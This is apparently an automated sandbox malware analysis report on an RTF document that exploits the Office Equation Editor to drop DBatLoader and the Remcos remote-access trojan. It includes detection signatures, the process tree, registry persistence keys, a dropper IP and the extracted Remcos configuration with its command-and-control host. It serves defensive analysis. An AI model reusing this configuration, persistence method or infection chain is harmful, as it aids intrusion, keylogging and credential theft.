Windows Analysis Report
OKhCyJ619J.rtf

Overview

General Information

Sample name: OKhCyJ619J.rtf (renamed because original name is a hash value)
Original sample name: 956ae61939b3dc9f9bbaed850423740b.rtf
Analysis ID: 1430800
MD5: 956ae61939b3dc9f9bbaed850423740b
SHA1: 4b4df10a00758993952f3528561f7edbc630376e
SHA256: 67d023bc333bfbf254e2501026b793921c1bdb9fcff76f5c168c4caaf7887774
Tags: rtf

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Snort IDS alert for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
PE file contains section with special chars
Searches for Windows Mail specific files
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3176 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3264 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • hjc.exe (PID: 3416 cmdline: "C:\Users\user\AppData\Roaming\hjc.exe" MD5: 46AE1DD2F5A1756EC2166E365971254D)
        • cmd.exe (PID: 3536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RdxcjsngO.bat" " MD5: AD7B9C14083B52BC532FBA5948342B98)
        • extrac32.exe (PID: 3552 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\hjc.exe C:\\Users\\Public\\Libraries\\Rdxcjsng.PIF MD5: 4D306ED01994EDF577B98FD59BF269C0)
        • remcos.exe (PID: 3572 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 46AE1DD2F5A1756EC2166E365971254D)
          • remcos.exe (PID: 3840 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\qrvhclucfnyufuwghezckwpljsyrzdsj" MD5: 46AE1DD2F5A1756EC2166E365971254D)
          • remcos.exe (PID: 3848 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\amas" MD5: 46AE1DD2F5A1756EC2166E365971254D)
          • remcos.exe (PID: 3864 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\dgnkdwq" MD5: 46AE1DD2F5A1756EC2166E365971254D)
          • remcos.exe (PID: 1804 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\pisbdjmsvpzm" MD5: 46AE1DD2F5A1756EC2166E365971254D)
          • remcos.exe (PID: 1712 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\skxtebeuixrzqiq" MD5: 46AE1DD2F5A1756EC2166E365971254D)
          • remcos.exe (PID: 200 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cecmfupoefjdsweembv" MD5: 46AE1DD2F5A1756EC2166E365971254D)
    • EQNEDT32.EXE (PID: 3856 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • Rdxcjsng.PIF (PID: 3784 cmdline: "C:\Users\Public\Libraries\Rdxcjsng.PIF" MD5: 46AE1DD2F5A1756EC2166E365971254D)
  • remcos.exe (PID: 3984 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 46AE1DD2F5A1756EC2166E365971254D)
  • remcos.exe (PID: 172 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 46AE1DD2F5A1756EC2166E365971254D)
  • Rdxcjsng.PIF (PID: 3328 cmdline: "C:\Users\Public\Libraries\Rdxcjsng.PIF" MD5: 46AE1DD2F5A1756EC2166E365971254D)
  • remcos.exe (PID: 3268 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 46AE1DD2F5A1756EC2166E365971254D)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Host:Port:Password": "uckdns.org:1166:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-L24XL1", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
OKhCyJ619J.rtf | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0x1acd:$obj2: \objdata
  • 0x1ab3:$obj3: \objupdate
Source | Rule | Description | Author | Strings
C:\Users\Public\Libraries\RdxcjsngO.bat | MALWARE_BAT_KoadicBAT | Koadic post-exploitation framework BAT payload | ditekSHen
  • 0x2:$s1: &@cls&@set
  • 0x5b:$s2: :~41,1%%
  • 0x67:$s2: :~47,1%%
  • 0x73:$s2: :~6,1%%
  • 0x7e:$s2: :~53,1%%
  • 0x8a:$s2: :~1,1%
  • 0x9b:$s2: :~10,1%%
  • 0xa7:$s2: :~39,1%%
  • 0xb3:$s2: :~16,1%%
  • 0xbf:$s2: :~13,1%%
  • 0xcb:$s2: :~25,1%%
  • 0xd7:$s2: :~53,1%%
  • 0xe3:$s2: :~42,1%%
  • 0xef:$s2: :~22,1%%
  • 0xfb:$s2: :~18,1%%
  • 0x107:$s2: :~48,1%%
  • 0x113:$s2: :~51,1%%
  • 0x11f:$s2: :~2,1%%
  • 0x12a:$s2: :~61,1%%
  • 0x136:$s2: :~9,1%%
  • 0x141:$s2: :~19,1%%
C:\ProgramData\fggrt\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
00000019.00000002.493989881.0000000003191000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000018.00000002.468510492.00000000007A9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000005.00000002.372380692.00000000002B9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
5.2.hjc.exe.318e1e0.3.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
12.2.Rdxcjsng.PIF.3003d38.2.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
5.2.hjc.exe.312984c.0.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
12.2.Rdxcjsng.PIF.2fe2a1c.1.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
12.2.Rdxcjsng.PIF.3003d38.2.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security

                        Exploits

                        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.198.26.173, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3264, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3264, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exe

                        System Summary

                        Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3264, Protocol: tcp, SourceIp: 103.198.26.173, SourceIsIpv6: false, SourcePort: 80
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Rdxcjsng.PIF" , CommandLine: "C:\Users\Public\Libraries\Rdxcjsng.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Rdxcjsng.PIF, NewProcessName: C:\Users\Public\Libraries\Rdxcjsng.PIF, OriginalFileName: C:\Users\Public\Libraries\Rdxcjsng.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\Public\Libraries\Rdxcjsng.PIF" , ProcessId: 3784, ProcessName: Rdxcjsng.PIF
                        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Rdxcjsng.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\hjc.exe, ProcessId: 3416, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rdxcjsng
                        Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\hjc.exe" , CommandLine: "C:\Users\user\AppData\Roaming\hjc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hjc.exe, NewProcessName: C:\Users\user\AppData\Roaming\hjc.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hjc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3264, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\hjc.exe" , ProcessId: 3416, ProcessName: hjc.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\hjc.exe" , CommandLine: "C:\Users\user\AppData\Roaming\hjc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hjc.exe, NewProcessName: C:\Users\user\AppData\Roaming\hjc.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hjc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3264, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\hjc.exe" , ProcessId: 3416, ProcessName: hjc.exe
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Rdxcjsng.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\hjc.exe, ProcessId: 3416, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rdxcjsng
                        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Rdxcjsng.PIF" , CommandLine: "C:\Users\Public\Libraries\Rdxcjsng.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Rdxcjsng.PIF, NewProcessName: C:\Users\Public\Libraries\Rdxcjsng.PIF, OriginalFileName: C:\Users\Public\Libraries\Rdxcjsng.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\Public\Libraries\Rdxcjsng.PIF" , ProcessId: 3784, ProcessName: Rdxcjsng.PIF
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\hjc.exe, ProcessId: 3416, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-L24XL1
                        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3264, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3176, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                        Stealing of Sensitive Information

                        Source: Registry Key setAuthor: Joe Security: Data: Details: D4 68 E8 10 40 21 E7 10 45 0C 9F 6C 6A 8B 27 14 CE 9A D2 52 3B D7 CD 49 DC 24 A4 50 2A 85 A6 2D 49 52 F2 DA 72 59 6E 65 72 08 F0 2B 2F 89 F7 EC BE F9 EC E1 9F DE 0E 6A 73 54 3B CC 6D FD 76 2F AB 2A , EventID: 13, EventType: SetValue, Image: C:\ProgramData\Remcos\remcos.exe, ProcessId: 3572, TargetObject: HKEY_CURRENT_USER\Software\Rmc-L24XL1\exepath
                        Timestamp: 04/24/24-07:44:31.694493 | SID: 2032777 | Source Port: 1166 | Destination Port: 49170 | Protocol: TCP | Classtype: A Network Trojan was detected
                        Timestamp: 04/24/24-07:42:15.923174 | SID: 2032776 | Source Port: 49170 | Destination Port: 1166 | Protocol: TCP | Classtype: A Network Trojan was detected

                        AV Detection

                        Source: OKhCyJ619J.rtf | Avira: detected
                        Source: http://geoplugin.net/json.gp/C | URL Reputation: Label: phishing
                        Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
                        Source: C:\Users\Public\Libraries\netutils.dll | Avira: detection malicious, Label: TR/AVI.Agent.rqsyc
                        Source: 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "uckdns.org:1166:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-L24XL1", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                        Source: C:\ProgramData\Remcos\remcos.exe | ReversingLabs: Detection: 71%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exe | ReversingLabs: Detection: 71%
                        Source: C:\Users\user\AppData\Roaming\hjc.exe | ReversingLabs: Detection: 71%
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIF | ReversingLabs: Detection: 71%
                        Source: C:\Users\Public\Libraries\netutils.dll | ReversingLabs: Detection: 82%
                        Source: OKhCyJ619J.rtf | ReversingLabs: Detection: 55%
                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000002.468510492.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.372380692.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.395322214.0000000000729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.431190937.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3572, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Rdxcjsng.PIF PID: 3784, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3984, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 172, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Rdxcjsng.PIF PID: 3328, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3268, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\fggrt\logs.dat, type: DROPPED
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\hjc.exeJoe Sandbox ML: detected
                        Source: C:\ProgramData\Remcos\remcos.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CD3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_15CD3837
                        Source: hjc.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                        Exploits

                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTR
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 103.198.26.173 Port: 80
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\hjc.exe
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                        Privilege Escalation

                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CA74FD _wcslen,CoGetObject,5_2_15CA74FD
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49165 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49168 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49175 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49178 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49181 version: TLS 1.0
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdb source: hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, easinvoker.exe.5.dr
                        Source: Binary string: easinvoker.pdbH source: hjc.exe, 00000005.00000003.369109514.000000001573E000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, easinvoker.exe.5.dr
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CA880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_15CA880C
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CA783C FindFirstFileW,FindNextFileW,5_2_15CA783C
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CBC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_15CBC291
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_032358CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,5_2_032358CC
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_2DE910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_2DE910F1
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_2DE96580 FindFirstFileExA,9_2_2DE96580
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CA7C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_15CA7C97
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
